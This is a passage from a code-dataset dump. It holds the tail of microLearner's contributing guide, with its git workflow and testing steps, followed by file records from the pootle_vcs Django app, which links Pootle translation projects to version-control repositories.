That can lead to frustration when the developer thinks they are done, but the reviewer requests large amounts of changes, and it is also very hard to review.\n\n\nSubmitting code to microLearner\n-------------------------------\n\nmicroLearner is hosted on [GitHub](http://www.github.com), and we use GitHub's [Pull Request](https://help.github.com/articles/using-pull-requests) mechanism for accepting submissions. You should go through the following steps to submit code to microLearner.\n\n1. Begin by [creating an issue](https://github.com/RNAer/microLearner/issues) describing your proposed change. This should include a description of your proposed change (is it a new feature, a bug fix, etc.), and note in the issue description that you want to work on it. Once you hear back from a maintainer that it is OK to make changes (i.e., they dont't have local edits, they agree with the change you'd like to make, and they're comfortable with you editing their code), we will assign the issue to you on GitHub.\n\n2. [Fork](https://help.github.com/articles/fork-a-repo) the microLearner repository on the GitHub website to your GitHub account.\n\n3. Clone your forked repository to the system where you'll be developing with ``git clone``.\n\n4. Ensure that you have the latest version of all files (especially important if you cloned a long time ago, but you'll need to do this before submitting changes regardless). You should do this by adding microLearner as a remote repository and then pulling from that repository. You'll only need to run the ``git remote`` step one time:\n ```\n git checkout master\n git remote add upstream https://github.com/RNAer/microLearner.git\n git pull upstream master\n ```\n\n5. Create a new topic branch that you will make your changes in with ``git checkout -b``:\n ```\n git checkout -b my-topic-branch\n ```\n\n6. Run ``nosetests --with-doctest ; flake8 microLearner setup.py`` to confirm that the tests pass before you make any changes. 
(you need to install flake8 ``pip install flake8``).\n\n7. Make your changes, add them (with ``git add``), and commit them (with ``git commit``). Don't forget to update associated scripts and tests as necessary. You should make incremental commits, rather than one massive commit at the end. Write descriptive commit messages to accompany each commit.\n\n8. When you think you're ready to submit your code, again ensure that you have the latest version of all files in case some changed while you were working on your edits. You can do this by merging master into your topic branch:\n ```\n git checkout my-topic-branch\n git pull upstream master\n ```\n\n9. Run ``nosetests --with-doctest ; flake8 microLearner setup.py`` to ensure that your changes did not cause anything expected to break. \n\n10. Once the tests pass, you should push your changes to your forked repository on GitHub using:\n ```\n git push origin my-topic-branch\n ```\n\n11. Issue a [pull request](https://help.github.com/articles/using-pull-requests) on the GitHub website to request that we merge your branch's changes into microLearner's master branch. One of the microLearner developers will review your code at this stage. If we request changes (which is very common), *don't issue a new pull request*. You should make changes on your topic branch, and commit and push them to GitHub. Your pull request will update automatically.\n\n12. Edit mode.\n\n Packages normally install under site-packages, but when you’re making changes, it makes more sense to run the package straight from the your local directory of the package. \"Editable\" installation creates a .pth file in site-packages that extends Python’s import path to find the package:\n ```\n pip install --editable path/to/the/package\n ```\n\n Once it is installed as edit mode, you can run the commands of the package. 
This is *really* helpful to see the effect of your changes in real time.\n\nCoding Guidelines\n-----------------\n\nWe adhere to the [PEP 8](http://www.python.org/dev/peps/pep-0008/) python coding guidelines for code and documentation standards. Before submitting any code to microLearner, you should read these carefully and apply the guidelines in your code.\n\n\nTesting Guidelines\n------------------\n\nAll code that is added to microLearner must be unit tested, and the unit test code must be submitted in the same pull request as the library code that you are submitting. We will not merge code that is not unit tested. The PyCogent Coding Guidelines describe our [expectations for unit tests](http://pycogent.org/coding_guidelines.html?highlight=coding%20guidelines#how-should-i-test-my-code). You should review the unit test section before working on your test code.\n\nTests can be executed using [nose](https://nose.readthedocs.org/en/latest/) by running `nosetests --with-doctest` from the base directory of the project or from within a Python or IPython session running the following code:\n\n``` python\n>>> import microLearner\n>>> microLearner.test()\n# full test suite is executed\n>>> microLearner.until.test()\n# tests for the util module are executed\n```\n\nNote that this is possible because the lines below are added at the end of each `__init__.py` file in the package, so if you add a new module, be sure to include these lines in its `__init__.py`:\n\n``` python\nfrom numpy.testing import Tester\ntest = Tester().test\n```\n\n\nDocumentation Guidelines\n------------------------\n\nWe strive to keep microLearner's code well-documented, particularly its public-facing API. See our [documentation guide](doc/README.md) for more details on writing documentation in microLearner.\n\nGetting help with git\n=====================\n\nIf you're new to ``git``, you'll probably find [gitref.org](http://gitref.org/) helpful.\n" } ]
9
phlax/pootle_vcs
https://github.com/phlax/pootle_vcs
d67d5de2742dbd517e9e99b9756bd9e4f12a7af6
5b993249c5eafedc73396e0b919f988c07e00b0e
3177471423d253d4f1266c996c2e9ceb3dee3e87
refs/heads/master
2021-01-10T06:17:29.229728
2015-09-28T12:24:55
2015-09-28T12:24:55
43,052,576
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.611872136592865, "alphanum_fraction": 0.611872136592865, "avg_line_length": 16.316831588745117, "blob_id": "612acc165b61d3943c926a29962d3f1b6d82e62c", "content_id": "152d3a3009c816d54a721f437dc895560c5fa6e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1752, "license_type": "no_license", "max_line_length": 79, "num_lines": 101, "path": "/README.rst", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "Pootle VCS\n----------\n\nPootle VCS app\n\n\n``vcs`` command\n---------------\n\nGet VCS info for all projects\n\n.. code-block:: bash\n\n pootle vcs\n\n\n``set_vcs`` subcommand\n----------------------\n\nSet the VCS for a project. Project must exist in Pootle.\n\n.. code-block:: bash\n\n pootle vcs myproject set_vcs git [email protected]:translate/myprojrepo\n\n\n``info`` subcommand\n-------------------\n\nGet the VCS info for a project. This is the default command - so ``info`` can\nbe ommitted.\n\n.. code-block:: bash\n\n pootle vcs myproject info\n\nor...\n\n.. code-block:: bash\n\n pootle vcs myproject\n\n\n``fetch_translations`` subcommand\n---------------------------------\n\nPull the VCS repository, and create a store_vcs object for each repository file\nthat has been matched from the ``.pootle.ini`` configuration file.\n\n.. code-block:: bash\n\n pootle vcs myproject fetch_translations\n\n\n``status`` subcommand\n---------------------\n\nList the status of files in Pootle and VCS - specifically files that are:\n\n- only in Pootle\n- only in VCS\n- updated in Pootle\n- updated in VCS\n- updated in both Pootle and VCS\n\n.. code-block:: bash\n\n pootle vcs myproject status\n\n\n``pull_translations`` subcommand\n--------------------------------\n\nPull translations from VCS into Pootle:\n\n- Create stores in Pootle where they dont exist already\n- Update exisiting stores from VCS translation file\n\n.. 
code-block:: bash\n\n pootle vcs myproject pull_translations\n\n\n\n---------------------------------------------\n\nProposed/unimplemented\n^^^^^^^^^^^^^^^^^^^^^^\n\n\n``add_translation`` subcommand\n------------------------------\n\nAdd a translation from Pootle into VCS\n\n\n\n``commit_translations`` subcommand\n----------------------------------\n\nCommit and push translations from Pootle into VCS\n\n\n\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.5909090638160706, "avg_line_length": 21, "blob_id": "566c5b6b0a5c6476012bc1d729b8a43c4311adb0", "content_id": "f4b32d4e99ac7267fa9579d6537ecadede0c8b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 57, "num_lines": 19, "path": "/pootle_vcs/migrations/0006_auto_20150923_2212.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_vcs', '0005_projectvcs_push_frequency'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='projectvcs',\n old_name='pull_frequency',\n new_name='fetch_frequency',\n ),\n ]\n" }, { "alpha_fraction": 0.6495059728622437, "alphanum_fraction": 0.6547061800956726, "avg_line_length": 27.701492309570312, "blob_id": "7530a7275a6dd36cab1ee63af9a12bb446e051c2", "content_id": "cee735ec53604b7a1ab6772700f4cea12214ec98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1923, "license_type": "no_license", "max_line_length": 77, "num_lines": 67, "path": "/pootle_vcs/models.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "from django.db import models\n\nfrom pootle_project.models import Project\nfrom pootle_store.models import Store\n\nfrom . 
import plugins\n\n\nclass StoreVCS(models.Model):\n store = models.ForeignKey(Store, related_name='vcs')\n last_sync_revision = models.IntegerField(blank=True, null=True)\n last_sync_commit = models.CharField(max_length=32, blank=True, null=True)\n path = models.CharField(max_length=32)\n\n @property\n def vcs(self):\n return self.store.translation_project.project.vcs.get()\n\n @property\n def repository_file(self):\n return self.vcs.plugin.file_class(\n self.vcs,\n self.path,\n self.store.translation_project.language,\n self.store.name,\n [s.name for s in self.store.parent.trail()])\n\n\nclass ProjectVCS(models.Model):\n project = models.ForeignKey(Project, related_name='vcs')\n url = models.URLField()\n vcs_type = models.CharField(max_length=32)\n enabled = models.BooleanField(default=True)\n fetch_frequency = models.IntegerField(default=0)\n push_frequency = models.IntegerField(default=0)\n pootle_config = models.CharField(max_length=32, default=\".pootle.ini\")\n\n @property\n def plugin(self):\n return plugins[self.vcs_type](self)\n\n ###########################\n # VCS Plugin implementation\n\n def pull(self):\n return self.plugin.pull()\n\n def get_latest_commit(self):\n return self.plugin.get_latest_commit()\n\n def fetch_translation_files(self):\n return self.plugin.fetch_translation_files()\n\n def list_translation_files(self):\n return self.plugin.translation_files\n\n def pull_translation_files(self):\n return self.plugin.pull_translation_files()\n\n def read_config(self):\n return self.plugin.read_config()\n\n def status(self):\n return self.plugin.status()\n\n # VCS Plugin implementation\n ###########################\n" }, { "alpha_fraction": 0.5480880737304688, "alphanum_fraction": 0.5608342885971069, "avg_line_length": 30.962963104248047, "blob_id": "5f09404cc4da66a4625835206f94be003f21f377", "content_id": "7e111b6ece66247399ce17f3ae603a33dd06a847", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 863, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/pootle_vcs/migrations/0008_storevcs.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_store', '0002_make_suggestion_user_not_null'),\n ('pootle_vcs', '0007_projectvcs_pootle_config'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='StoreVCS',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('last_sync_revision', models.IntegerField(null=True, blank=True)),\n ('last_sync_commit', models.CharField(max_length=32)),\n ('store', models.ForeignKey(related_name='vcs', to='pootle_store.Store')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6727272868156433, "alphanum_fraction": 0.6755244731903076, "avg_line_length": 27.600000381469727, "blob_id": "97769f2863e8b8fe1ce7cf9ff05f445f3c4602da", "content_id": "b741d8593cead3b2ea51092b059746ea422da1ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 715, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/pootle_vcs/management/commands/__init__.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. 
See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom pootle_vcs.models import ProjectVCS\n\n\nclass SubCommand(BaseCommand):\n\n requires_system_checks = False\n\n def get_vcs(self, project):\n try:\n return project.vcs.get()\n except ProjectVCS.DoesNotExist:\n raise CommandError(\n \"Project (%s) is not managed in VCS\"\n % project.code)\n" }, { "alpha_fraction": 0.6855421662330627, "alphanum_fraction": 0.6963855624198914, "avg_line_length": 32.8775520324707, "blob_id": "ebccc72ef8808ccf9f76d5c7d57ab233836eb50b", "content_id": "2ed0dc6d7889682117b7af7b110b4c2ab23589ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1660, "license_type": "no_license", "max_line_length": 79, "num_lines": 49, "path": "/setup.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2006-2013 Translate House\n#\n# This file is part of Pootle_Vcs.\n#\n# Pootle_Vcs is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free Software\n# Foundation; either version 2 of the License, or (at your option) any later\n# version.\n#\n# Pootle_Vcs is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with\n# Pootle_Vcs; if not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"A setuptools based setup module.\n\nSee:\nhttps://packaging.python.org/en/latest/distributing.html\nhttps://github.com/pypa/sampleproject\n\"\"\"\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n\nsetup(\n name='pootle_vcs',\n version='0.0.1',\n description='Pootle VCS integration',\n long_description=\"Integration between Pootle and VCS backends\",\n url='https://github.com/phlax/pootle_vcs',\n author='Ryan Northey',\n author_email='[email protected]',\n license='GPL3',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: GPL3',\n 'Programming Language :: Python :: 2.7',\n ],\n keywords='pootle vcs',\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n install_requires=['rq_scheduler', 'pootle'],\n)\n" }, { "alpha_fraction": 0.5414634346961975, "alphanum_fraction": 0.5829268097877502, "avg_line_length": 20.578947067260742, "blob_id": "227898023c29c7367c971e7c0757d9edd0e8f264", "content_id": "e506c43fb6622d56c09689c686a3b951af74c4cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 410, "license_type": "no_license", "max_line_length": 50, "num_lines": 19, "path": "/pootle_vcs/migrations/0004_auto_20150923_2206.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_vcs', '0003_auto_20150923_2155'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='projectvcs',\n old_name='poll_frequency',\n new_name='pull_frequency',\n ),\n ]\n" 
}, { "alpha_fraction": 0.5215517282485962, "alphanum_fraction": 0.5232758522033691, "avg_line_length": 29.526315689086914, "blob_id": "66d88ec7447ff175f82104b610be76c13ca46093", "content_id": "3e61c2950b6aa9010d423d86b4364b0c126fa8c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1160, "license_type": "no_license", "max_line_length": 60, "num_lines": 38, "path": "/pootle_vcs/finder.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import os\nimport re\n\n\nclass TranslationFileFinder(object):\n\n path_mapping = (\n (\".\", \"\\.\"),\n (\"<lang>\", \"(?P<lang>[\\w]*)\"),\n (\"<filename>\", \"(?P<filename>[\\w]*)\"),\n (\"<directory_path>\", \"(?P<directory_path>[\\w\\/]*)\"))\n\n def __init__(self, translation_path):\n self.translation_path = translation_path\n self.regex = re.compile(self._parse_path())\n\n @property\n def file_root(self):\n file_root = self.translation_path.split(\"<\")[0]\n if not file_root.endswith(\"/\"):\n file_root = \"/\".join(file_root.split(\"/\")[:-1])\n return file_root\n\n def find(self):\n # TODO: make sure translation_path has no ..\n # ..validate\n for root, dirs, files in os.walk(self.file_root):\n for filename in files:\n file_path = os.path.join(root, filename)\n match = self.regex.match(file_path)\n if match:\n yield file_path, match.groupdict()\n\n def _parse_path(self):\n path = self.translation_path\n for k, v in self.path_mapping:\n path = path.replace(k, v)\n return path\n" }, { "alpha_fraction": 0.5743898153305054, "alphanum_fraction": 0.5743898153305054, "avg_line_length": 27.216981887817383, "blob_id": "b028ed41b512547d863a1fb700680b73ed082636", "content_id": "219890cb249e0ed04edbbff3e6d8753ef2f93623", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2991, "license_type": "no_license", "max_line_length": 75, "num_lines": 106, "path": "/pootle_vcs/files.py", "repo_name": 
"phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import os\n\nfrom import_export.utils import import_file\n\nfrom pootle_store.models import Store\nfrom pootle_translationproject.models import TranslationProject\n\n\nclass RepositoryFile(object):\n\n def __init__(self, vcs, path, language, filename, directory_path=None):\n self.vcs = vcs\n self.language = language\n self.filename = filename\n if directory_path is not None:\n self.directory_path = '/'.join(directory_path)\n else:\n self.directory_path = []\n self.path = path\n\n def __str__(self):\n return \"<%s: %s>\" % (self.__name__, self.pootle_path)\n\n @property\n def pootle_path(self):\n return \"/\".join(\n ['']\n + [x for x in\n [self.language.code,\n self.project.code,\n self.directory_path,\n self.filename]\n if x])\n\n @property\n def file_path(self):\n return os.path.join(\n self.vcs.plugin.local_repo_path,\n self.path.strip(\"/\"))\n\n @property\n def exists(self):\n return os.path.exists(self.file_path)\n\n @property\n def project(self):\n return self.vcs.project\n\n @property\n def translation_project(self):\n try:\n return self.project.translationproject_set.get(\n language=self.language)\n except TranslationProject.DoesNotExist:\n return TranslationProject.objects.create(\n project=self.vcs.project,\n language=self.language)\n\n @property\n def directory(self):\n directory = self.translation_project.directory\n if self.directory_path:\n for subdir in self.directory_path.split(\"/\"):\n (directory,\n created) = directory.child_dirs.get_or_create(name=subdir)\n return directory\n\n @property\n def store(self):\n store, created = Store.objects.get_or_create(\n parent=self.directory,\n translation_project=self.translation_project,\n name=self.filename)\n if created:\n store.save()\n return store\n\n @property\n def store_vcs(self):\n from pootle_vcs.models import StoreVCS\n store_vcs, created = StoreVCS.objects.get_or_create(\n store=self.store, path=self.path)\n return store_vcs\n\n @property\n 
def latest_commit(self):\n raise NotImplementedError\n\n def fetch(self):\n return self.store_vcs\n\n def pull(self):\n with open(self.file_path) as f:\n import_file(\n f,\n pootle_path=self.pootle_path,\n rev=self.store.get_max_unit_revision())\n store_vcs = self.store_vcs\n store_vcs.last_sync_commit = self.latest_commit\n store_vcs.last_sync_revision = self.store.get_max_unit_revision()\n store_vcs.save()\n\n def read(self):\n # self.vcs.pull()\n with open(self.file_path) as f:\n return f.read()\n" }, { "alpha_fraction": 0.5356613993644714, "alphanum_fraction": 0.5356613993644714, "avg_line_length": 28.716981887817383, "blob_id": "ede605ee357e5bc1ac2fc59c62577fb0adc9e749", "content_id": "b824b157d9ae3ee5859fd19da103bc3b93868829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4725, "license_type": "no_license", "max_line_length": 78, "num_lines": 159, "path": "/pootle_vcs/plugins.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import io\nimport logging\nimport os\nfrom ConfigParser import ConfigParser\n\nfrom pootle_language.models import Language\nfrom pootle_store.models import Store\n\nfrom .files import RepositoryFile\nfrom .finder import TranslationFileFinder\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Plugin(object):\n name = None\n file_class = RepositoryFile\n\n def __init__(self, vcs):\n self.vcs = vcs\n\n @property\n def is_cloned(self):\n if os.path.exists(self.local_repo_path):\n return True\n return False\n\n @property\n def local_repo_path(self):\n vcs_path = \"/tmp\"\n return os.path.join(vcs_path, self.vcs.project.code)\n\n @property\n def project(self):\n return self.vcs.project\n\n @property\n def stores(self):\n return Store.objects.filter(\n translation_project__project=self.project)\n\n @property\n def translation_files(self):\n from .models import StoreVCS\n return StoreVCS.objects.filter(\n store__translation_project__project=self.project)\n\n def 
fetch_translation_files(self):\n for repo_file in self.find_translation_files():\n repo_file.fetch()\n\n def find_translation_files(self):\n config = self.read_config()\n\n for section in config.sections():\n if section == \"default\":\n section_subdirs = []\n else:\n section_subdirs = section.split(\"/\")\n\n finder = TranslationFileFinder(\n os.path.join(\n self.local_repo_path,\n config.get(section, \"translation_path\")))\n for file_path, matched in finder.find():\n lang_code = matched['lang']\n try:\n language = Language.objects.get(code=lang_code)\n except Language.DoesNotExist:\n logger.warning(\n \"Language does not exist for %s: %s\"\n % (self.vcs, lang_code))\n subdirs = (\n section_subdirs\n + [m for m in\n matched.get('directory_path', '').strip(\"/\").split(\"/\")\n if m])\n filename = (\n matched.get(\"filename\") or os.path.basename(file_path))\n yield self.file_class(\n self.vcs,\n file_path.replace(self.local_repo_path, \"\"),\n language,\n filename,\n subdirs)\n\n def pull_translation_files(self):\n for repo_file in self.find_translation_files():\n repo_file.pull()\n\n def pull(self):\n raise NotImplementedError\n\n def push(self):\n raise NotImplementedError\n\n def read(self, path):\n target = os.path.join(self.local_repo_path, path)\n with open(target) as f:\n content = f.read()\n return content\n\n def read_config(self):\n self.pull()\n config = ConfigParser()\n config.readfp(io.BytesIO(self.read(self.vcs.pootle_config)))\n return config\n\n def status(self):\n self.pull()\n status = dict(\n CONFLICT=[],\n VCS_ADDED=[],\n VCS_AHEAD=[],\n POOTLE_AHEAD=[])\n\n for store_vcs in self.translation_files:\n repo_file = store_vcs.repository_file\n repo_removed = not repo_file.exists\n repo_added = (\n store_vcs.last_sync_commit is None)\n repo_changed = (\n store_vcs.last_sync_commit is not None\n and (repo_file.latest_commit\n != store_vcs.last_sync_commit))\n pootle_changed = (\n store_vcs.last_sync_commit is not None\n and 
(store_vcs.store.get_max_unit_revision()\n != store_vcs.last_sync_revision))\n if repo_removed:\n status['VCS_REMOVED'].append(store_vcs)\n elif repo_added:\n status['VCS_ADDED'].append(store_vcs)\n elif repo_changed and pootle_changed:\n status['CONFLICT'].append(store_vcs)\n elif repo_changed:\n status['VCS_AHEAD'].append(store_vcs)\n elif pootle_changed:\n status['POOTLE_AHEAD'].append(store_vcs)\n\n status['POOTLE_ADDED'] = self.stores.filter(vcs__isnull=True)\n\n return status\n\n\nclass Plugins(object):\n\n def __init__(self):\n self.__plugins__ = {}\n\n def register(self, plugin):\n self.__plugins__[plugin.name] = plugin\n\n def __getitem__(self, k):\n return self.__plugins__[k]\n\n def __contains__(self, k):\n return k in self.__plugins__\n" }, { "alpha_fraction": 0.67463618516922, "alphanum_fraction": 0.6767151951789856, "avg_line_length": 39.08333206176758, "blob_id": "7a6b336c22131f600285e60f89951937b683b96a", "content_id": "171179d05f053e4ec0d5e950891f41c0009a74e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 962, "license_type": "no_license", "max_line_length": 77, "num_lines": 24, "path": "/pootle_vcs/management/commands/vcs_commands/info.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. 
See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass ProjectInfoCommand(SubCommand):\n help = \"List VCS translations files managed by Pootle.\"\n\n def handle(self, project, *args, **options):\n vcs = self.get_vcs(project)\n self.stdout.write(\"Project: %s\" % project.code)\n self.stdout.write(\"type: %s\" % vcs.vcs_type)\n self.stdout.write(\"URL: %s\" % vcs.url)\n self.stdout.write(\"enabled: %s\" % vcs.enabled)\n self.stdout.write(\"latest commit: %s\" % vcs.get_latest_commit())\n self.stdout.write(\"fetch frequency: %s\" % vcs.fetch_frequency)\n self.stdout.write(\"push frequency: %s\" % vcs.push_frequency)\n" }, { "alpha_fraction": 0.6286388635635376, "alphanum_fraction": 0.6302124261856079, "avg_line_length": 32.01298522949219, "blob_id": "17d044e284cb10857155971992015d3d4b8ec48e", "content_id": "f1eab6858bb8228655542ddbc2d10c6940451b6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2542, "license_type": "no_license", "max_line_length": 77, "num_lines": 77, "path": "/pootle_vcs/management/commands/vcs.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. 
See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nimport logging\nimport os\nfrom optparse import NO_DEFAULT\n\n# This must be run before importing Django.\nos.environ['DJANGO_SETTINGS_MODULE'] = 'pootle.settings'\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom pootle_project.models import Project\n\nfrom pootle_vcs.models import ProjectVCS\n\nfrom .vcs_commands.info import ProjectInfoCommand\nfrom .vcs_commands.fetch_translations import FetchTranslationsCommand\nfrom .vcs_commands.files import FilesCommand\nfrom .vcs_commands.pull_translations import PullTranslationsCommand\nfrom .vcs_commands.set_vcs import SetVCSCommand\nfrom .vcs_commands.status import StatusCommand\n\n\nlogger = logging.getLogger('pootle.vcs')\n\n\nclass Command(BaseCommand):\n help = \"Pootle VCS.\"\n subcommands = {\n \"info\": ProjectInfoCommand,\n \"fetch_translations\": FetchTranslationsCommand,\n \"files\": FilesCommand,\n \"pull_translations\": PullTranslationsCommand,\n \"set_vcs\": SetVCSCommand,\n \"status\": StatusCommand}\n\n def handle_subcommand(self, project, command, *args, **options):\n try:\n subcommand = self.subcommands[command]()\n except KeyError:\n raise CommandError(\"Unrecognised command: %s\" % command)\n defaults = {}\n for opt in subcommand.option_list:\n if opt.default is NO_DEFAULT:\n defaults[opt.dest] = None\n else:\n defaults[opt.dest] = opt.default\n defaults.update(options)\n return subcommand.execute(project, *args, **defaults)\n\n def handle(self, *args, **kwargs):\n if args:\n project_code = args[0]\n args = args[1:]\n try:\n project = Project.objects.get(code=project_code)\n except Project.DoesNotExist:\n project = None\n\n if project:\n return self.handle_subcommand(\n project, *(args or ['info']), **kwargs)\n else:\n for project in Project.objects.all():\n try:\n self.stdout.write(\n \"%s\\t%s\"\n % (project.code, project.vcs.get().url))\n except 
ProjectVCS.DoesNotExist:\n pass\n" }, { "alpha_fraction": 0.6461684107780457, "alphanum_fraction": 0.652790904045105, "avg_line_length": 28.36111068725586, "blob_id": "2ea30202ff00928afcdcfe831a5882195d50b52c", "content_id": "c13b9b48210b28f21010880c8d41cc5701284e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1057, "license_type": "no_license", "max_line_length": 77, "num_lines": 36, "path": "/pootle_vcs/management/commands/vcs_commands/set_vcs.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom django.core.management.base import CommandError\n\nfrom pootle_vcs import plugins\nfrom pootle_vcs.management.commands import SubCommand\nfrom pootle_vcs.models import ProjectVCS\n\n\nclass SetVCSCommand(SubCommand):\n help = \"Status of vcs repositories.\"\n\n def handle(self, project, *args, **options):\n if not args or not len(args) == 2:\n raise CommandError(\"You must a VCS type and VCS url\")\n\n try:\n plugins[args[0]]\n except KeyError:\n raise CommandError(\"Unrecognised VCS type: %s\" % args[0])\n\n try:\n vcs = project.vcs.get()\n except ProjectVCS.DoesNotExist:\n vcs = project.vcs.create()\n\n vcs.vcs_type = args[0]\n vcs.url = args[1]\n vcs.save()\n" }, { "alpha_fraction": 0.6036866307258606, "alphanum_fraction": 0.6082949042320251, "avg_line_length": 17.08333396911621, "blob_id": "a89b3bb8f4c356aeefbfadbb0f51da654cb1c57f", "content_id": "5c2e4478bd7cf6085b0571ec175d5f61acb91f8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 46, "num_lines": 12, "path": 
"/pootle_vcs/schedule.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import django_rq\nimport datetime\n\n\ndef func():\n print \"Boom!\"\n\n\nscheduler = django_rq.get_scheduler('default')\nscheduler.schedule(datetime.datetime.utcnow(),\n func,\n interval=5)\n" }, { "alpha_fraction": 0.7311828136444092, "alphanum_fraction": 0.7347670197486877, "avg_line_length": 31.823530197143555, "blob_id": "34e9b36df459f5d15bdba997f6c6b3af1b821e36", "content_id": "2390aed7e3946bb1682ac0cc69e85f741ea82670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 558, "license_type": "no_license", "max_line_length": 77, "num_lines": 17, "path": "/pootle_vcs/management/commands/vcs_commands/fetch_translations.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. 
